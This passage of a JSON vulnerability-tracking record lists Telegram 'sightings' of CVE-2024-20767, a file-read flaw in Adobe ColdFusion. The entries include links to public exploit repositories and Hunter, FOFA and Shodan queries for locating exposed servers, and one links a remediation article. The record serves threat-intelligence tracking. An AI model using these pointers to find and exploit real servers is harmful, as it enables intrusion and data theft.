ColdFusion\n\n\n#Cve #Exploit\n\u2014\u2014\u2014\u2014\u2014\u2014\u200c\n0Day.Today\n@LearnExploit\n@Tech_Army", "creation_timestamp": "2024-03-26T18:32:38.000000Z"}, {"uuid": "2bbbf9eb-9424-4677-811f-0e5c19c6ea39", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2024-20767", "type": "published-proof-of-concept", "source": "https://t.me/CyberSecurityTechnologies/10227", "content": "#exploit\nCVE-2024-20767:\nAccess Control vulnerability in Adobe ColdFusion\nhttps://github.com/yoryio/CVE-2024-20767", "creation_timestamp": "2024-11-19T17:32:18.000000Z"}, {"uuid": "f13c0027-76df-4f8a-86dc-8b612fe41993", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2024-20767", "type": "seen", "source": "https://t.me/kasraone_com/686", "content": "CVE-2024-20767 - \n\nArbitrary file system read using an Improper Access Control vulnerability in Adobe ColdFusion\n\n\n\u0633\u06cc\u0633\u062a\u0645 \u0641\u0627\u06cc\u0644 \u062f\u0644\u062e\u0648\u0627\u0647 \u0628\u0627 \u0627\u0633\u062a\u0641\u0627\u062f\u0647 \u0627\u0632 \u06cc\u06a9 \u0622\u0633\u06cc\u0628 \u067e\u0630\u06cc\u0631\u06cc \u06a9\u0646\u062a\u0631\u0644 \u062f\u0633\u062a\u0631\u0633\u06cc \u0646\u0627\u0645\u0646\u0627\u0633\u0628\n \u062f\u0631 Adobe ColdFusion \n\u062e\u0648\u0627\u0646\u062f\u0647 \u0645\u06cc \u0634\u0648\u062f\n\nQuery:\n\nHunter: product.name=\"Adobe ColdFusion\"\nFOFA: app=\"Adobe-ColdFusion\"\nSHODAN: http.component:\"Adobe ColdFusion\"\n\n\n\nExploit:\n\nhttps://github.com/yoryio/CVE-2024-20767\nhttps://github.com/Chocapikk/CVE-2024-20767\n\n\n\nBlog:\n\nhttps://jeva.cc/2973.html\n\n\n\n\n\u00a0\u00a0\u00a0\u00a0\u00a0 \u00a0\u00a0 \u2661 \u2800\u2800 \u3007\u2800\u00a0 \u2800 \u2399\u2800\u200c\u00a0 \u200c \u2332\u2063 \n\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0 \u02e1\u2071\u1d4f\u1d49\u00a0 \u1d9c\u1d52\u1d50\u1d50\u1d49\u207f\u1d57\u00a0\u00a0 \u02e2\u1d43\u1d5b\u1d49\u00a0 \u02e2\u02b0\u1d43\u02b3\u1d49\n\n\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0 K1\n\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0 kasraone", "creation_timestamp": "2024-04-01T22:17:27.000000Z"}, {"uuid": "68914da5-83d7-4eda-abd6-a897f7e8d2fb", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2024-20767", "type": "exploited", "source": "https://t.me/DEVIL_La_RSx/369", "content": "Remediation for CVE-2024-20767 and CVE-2024-21216: Protect Yourself Against Two Recent Critical Bugs Exploitable in the Wild\n\nhttps://blog.securelayer7.net/coldfusion-path-traversal-and-weblogic-unauthenticated-rce-remediation/", "creation_timestamp": "2024-11-20T22:31:29.000000Z"}]}